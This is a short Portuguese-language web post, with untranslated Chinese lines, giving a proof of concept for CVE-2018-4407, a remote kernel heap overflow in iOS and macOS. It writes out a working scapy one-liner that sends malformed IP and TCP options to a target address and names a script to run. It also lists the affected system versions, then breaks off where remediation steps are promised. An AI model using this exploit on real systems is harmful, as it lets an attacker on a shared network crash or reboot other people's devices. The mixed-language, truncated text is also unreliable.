
iOS 12 / OS X Overflow de Heap no Kernel Remoto (CVE-2018-4407) POC
*iOS 12 / OS X Remote Kernel Heap Overflow (CVE-2018-4407) POC:
pip install scapy
sudo scapy
send(IP(dst=“Target IP“,options=[IPOption(“A”*8)])/TCP(dport=2323,options=[(19, “1"*18),(19, “2”*18)]))
Ou use o script
python check_icmp_dos.py 127.0.0.1
Esta vulnerabilidade permite que um atacante, uma vez conectado à mesma rede Wi-Fi, envie pacotes maliciosos para outros usuários desavisados, causando a falha ou reinicialização de qualquer dispositivo Mac ou iOS. Como a vulnerabilidade existe no código central da rede do sistema, nenhum software antivírus pode se defender.
Dispositivos rodando os seguintes sistemas operacionais são vulneráveis:
Apple iOS 11及更早版本:所有设备(升级到iOS 12的部分设备)
Apple macOS High Sierra(受影响的最高版本为10.13.6):所有设备(通过安全更新2018-001修复)
Apple macOS Sierra(受影响的最高版本为10.12.6):所有设备(通过安全更新2018-005中修复)
Apple OS X El Capitan及更早版本:所有设备
Atualmente, a Apple já lançou a atualização iOS 12.1 para corrigir essa vulnerabilidade. Recomenda-se que os usuários verifiquem a versão do sistema o mais rápido possível. Se afetados, tome medidas de correção imediatamente. As medidas de correção são as seguintes: